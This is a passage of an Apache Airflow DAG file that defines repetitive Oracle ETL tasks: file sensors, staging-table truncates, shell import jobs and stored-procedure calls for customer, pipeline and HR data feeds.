sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Premium_Freight_WH"
ODS_UC_Premium_Freight_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Premium_Freight_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Premium_Freight_STG"
UC_Premium_Freight_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Premium_Freight"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Premium_Freight_LD"
ODS_UC_Premium_Freight_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Premium_Freight"
)
# JOB_TYPE=SQL
my_taskid = "UC_Premium_Freight"
UC_Premium_Freight = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_RFQ_Freight_Estimate_MAP_WH"
ODS_UC_RFQ_Freight_Estimate_MAP_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_RFQ_Freight_Estimate_MAP_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_RFQ_Freight_Estimate_MAP_STG"
UC_RFQ_Freight_Estimate_MAP_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_RFQ_Freight_Estimate_MAP"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_RFQ_Freight_Estimate_MAP_LD"
ODS_UC_RFQ_Freight_Estimate_MAP_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_RFQ_Freight_Estimate_MAP"
)
# JOB_TYPE=SQL
my_taskid = "UC_RFQ_Freight_Estimate_MAP"
UC_RFQ_Freight_Estimate_MAP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_RFQ_Critical_Parts_MAP_WH"
ODS_UC_RFQ_Critical_Parts_MAP_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_RFQ_Critical_Parts_MAP_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_RFQ_Critical_Parts_MAP_STG"
UC_RFQ_Critical_Parts_MAP_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_RFQ_Critical_Parts_MAP"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_RFQ_Critical_Parts_MAP_LD"
ODS_UC_RFQ_Critical_Parts_MAP_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_RFQ_Critical_Parts_MAP"
)
# JOB_TYPE=SQL
my_taskid = "UC_RFQ_Critical_Parts_MAP"
UC_RFQ_Critical_Parts_MAP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_RFQ_Key_parts_MAP_WH"
ODS_UC_RFQ_Key_parts_MAP_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_RFQ_Key_parts_MAP_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_RFQ_Key_parts_MAP_STG"
UC_RFQ_Key_parts_MAP_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_RFQ_Key_parts_MAP"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_RFQ_Key_parts_MAP_LD"
ODS_UC_RFQ_Key_parts_MAP_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_RFQ_Key_parts_MAP"
)
# JOB_TYPE=SQL
my_taskid = "UC_RFQ_Key_parts_MAP"
UC_RFQ_Key_parts_MAP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Company_and_Background_Check_WH"
ODS_UC_Company_and_Background_Check_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Company_and_Background_Check_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Company_and_Background_Check_STG"
UC_Company_and_Background_Check_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Company_and_Background_Check"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Company_and_Background_Check_LD"
ODS_UC_Company_and_Background_Check_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Company_and_Background_Check"
)
# JOB_TYPE=SQL
my_taskid = "UC_Company_and_Background_Check"
UC_Company_and_Background_Check = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Customer_PO_Management_WH"
ODS_UC_Customer_PO_Management_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Customer_PO_Management_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Customer_PO_Management_STG"
UC_Customer_PO_Management_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Customer_PO_Management"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Customer_PO_Management_LD"
ODS_UC_Customer_PO_Management_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Customer_PO_Management"
)
# JOB_TYPE=SQL
my_taskid = "UC_Customer_PO_Management"
UC_Customer_PO_Management = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_NC_Customer_Rebate_PN_WH"
ODS_UC_NC_Customer_Rebate_PN_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_NC_Customer_Rebate_PN_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_NC_Customer_Rebate_PN_STG"
UC_NC_Customer_Rebate_PN_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_NC_Customer_Rebate_PN"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_NC_Customer_Rebate_PN_LD"
ODS_UC_NC_Customer_Rebate_PN_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_NC_Customer_Rebate_PN"
)
# JOB_TYPE=SQL
my_taskid = "UC_NC_Customer_Rebate_PN"
UC_NC_Customer_Rebate_PN = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Risk_Shipment_Weekly_WH"
ODS_UC_Risk_Shipment_Weekly_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Risk_Shipment_Weekly_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Risk_Shipment_Weekly_STG"
UC_Risk_Shipment_Weekly_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Risk_Shipment_Weekly"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Risk_Shipment_Weekly_LD"
ODS_UC_Risk_Shipment_Weekly_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Risk_Shipment_Weekly"
)
# JOB_TYPE=SQL
my_taskid = "UC_Risk_Shipment_Weekly"
UC_Risk_Shipment_Weekly = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_NC_ROYALTY_REPORT_WH"
ODS_UC_NC_ROYALTY_REPORT_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_NC_ROYALTY_REPORT_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_NC_ROYALTY_REPORT_STG"
UC_NC_ROYALTY_REPORT_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_NC_ROYALTY_REPORT"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_NC_ROYALTY_REPORT_LD"
ODS_UC_NC_ROYALTY_REPORT_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_NC_ROYALTY_REPORT"
)
# JOB_TYPE=SQL
my_taskid = "UC_NC_ROYALTY_REPORT"
UC_NC_ROYALTY_REPORT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=SQL
my_taskid = "UG_PIPELINE_PROJECT_CONVERSION"
UG_PIPELINE_PROJECT_CONVERSION = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_GBD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UG_PIPELINE_PROJECT_CONVERSION_WH"
ODS_UG_PIPELINE_PROJECT_CONVERSION_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_GBD,
filepath= "{{ var.value.DIR_SOURCE }}UPD/GBD/UG_PIPELINE_PROJECT_CONVERSION_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UG_PIPELINE_PROJECT_CONVERSION_STG"
UG_PIPELINE_PROJECT_CONVERSION_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_GBD,
sql= "TRUNCATE TABLE STAGE.UG_PIPELINE_PROJECT_CONVERSION"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UG_PIPELINE_PROJECT_CONVERSION_LD"
ODS_UG_PIPELINE_PROJECT_CONVERSION_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_GBD,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD GBD UG_PIPELINE_PROJECT_CONVERSION"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_SENIORITY_WH"
ODS_UH_SENIORITY_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_SENIORITY_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_SENIORITY_STG"
UH_SENIORITY_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_SENIORITY"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_SENIORITY_LD"
ODS_UH_SENIORITY_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_SENIORITY"
)
# JOB_TYPE=SQL
my_taskid = "UH_SENIORITY"
UH_SENIORITY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_HEADCOUNT_BUDGET_WH"
ODS_UH_HEADCOUNT_BUDGET_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_HEADCOUNT_BUDGET_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_HEADCOUNT_BUDGET_STG"
UH_HEADCOUNT_BUDGET_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_HEADCOUNT_BUDGET"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_HEADCOUNT_BUDGET_LD"
ODS_UH_HEADCOUNT_BUDGET_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_HEADCOUNT_BUDGET"
)
# JOB_TYPE=SQL
my_taskid = "UH_HEADCOUNT_BUDGET"
UH_HEADCOUNT_BUDGET = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_RDEXPENSE_WH"
ODS_UH_RDEXPENSE_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_RDEXPENSE_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_RDEXPENSE_STG"
UH_RDEXPENSE_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_RDEXPENSE"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_RDEXPENSE_LD"
ODS_UH_RDEXPENSE_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_RDEXPENSE"
)
# JOB_TYPE=SQL
my_taskid = "UH_RDEXPENSE"
UH_RDEXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_WORKPLACE_MAPPING_WH"
ODS_UH_WORKPLACE_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_WORKPLACE_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_WORKPLACE_MAPPING_STG"
UH_WORKPLACE_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_WORKPLACE_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_WORKPLACE_MAPPING_LD"
ODS_UH_WORKPLACE_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_WORKPLACE_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_WORKPLACE_MAPPING"
UH_WORKPLACE_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_WORKLOCATION_WH"
ODS_UH_WORKLOCATION_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_WORKLOCATION_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_WORKLOCATION_STG"
UH_WORKLOCATION_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_WORKLOCATION"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_WORKLOCATION_LD"
ODS_UH_WORKLOCATION_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_WORKLOCATION"
)
# JOB_TYPE=SQL
my_taskid = "UH_WORKLOCATION"
UH_WORKLOCATION = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_WORKLOCATION_MAPPING_WH"
ODS_UH_WORKLOCATION_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_WORKLOCATION_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_WORKLOCATION_MAPPING_STG"
UH_WORKLOCATION_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_WORKLOCATION_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_WORKLOCATION_MAPPING_LD"
ODS_UH_WORKLOCATION_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_WORKLOCATION_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_WORKLOCATION_MAPPING"
UH_WORKLOCATION_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_DEPTABBRE_BU_MAPPING_WH"
ODS_UH_DEPTABBRE_BU_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_DEPTABBRE_BU_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_DEPTABBRE_BU_MAPPING_STG"
UH_DEPTABBRE_BU_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_DEPTABBRE_BU_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_DEPTABBRE_BU_MAPPING_LD"
ODS_UH_DEPTABBRE_BU_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_DEPTABBRE_BU_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_DEPTABBRE_BU_MAPPING"
UH_DEPTABBRE_BU_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_DEPTABBRE_WH"
ODS_UH_DEPTABBRE_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_DEPTABBRE_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_DEPTABBRE_STG"
UH_DEPTABBRE_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_DEPTABBRE"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_DEPTABBRE_LD"
ODS_UH_DEPTABBRE_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_DEPTABBRE"
)
# JOB_TYPE=SQL
my_taskid = "UH_DEPTABBRE"
UH_DEPTABBRE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_DEPTUNIT_MAPPING_WH"
ODS_UH_DEPTUNIT_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_DEPTUNIT_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_DEPTUNIT_MAPPING_STG"
UH_DEPTUNIT_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_DEPTUNIT_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_DEPTUNIT_MAPPING_LD"
ODS_UH_DEPTUNIT_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_DEPTUNIT_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_DEPTUNIT_MAPPING"
UH_DEPTUNIT_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_PERSONNEL_CATEGORY_WH"
ODS_UH_PERSONNEL_CATEGORY_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_PERSONNEL_CATEGORY_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_PERSONNEL_CATEGORY_STG"
UH_PERSONNEL_CATEGORY_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_PERSONNEL_CATEGORY"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_PERSONNEL_CATEGORY_LD"
ODS_UH_PERSONNEL_CATEGORY_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_PERSONNEL_CATEGORY"
)
# JOB_TYPE=SQL
my_taskid = "UH_PERSONNEL_CATEGORY"
UH_PERSONNEL_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_PERSONNEL_CATEGORY_MAPPING_WH"
ODS_UH_PERSONNEL_CATEGORY_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_PERSONNEL_CATEGORY_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_PERSONNEL_CATEGORY_MAPPING_STG"
UH_PERSONNEL_CATEGORY_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
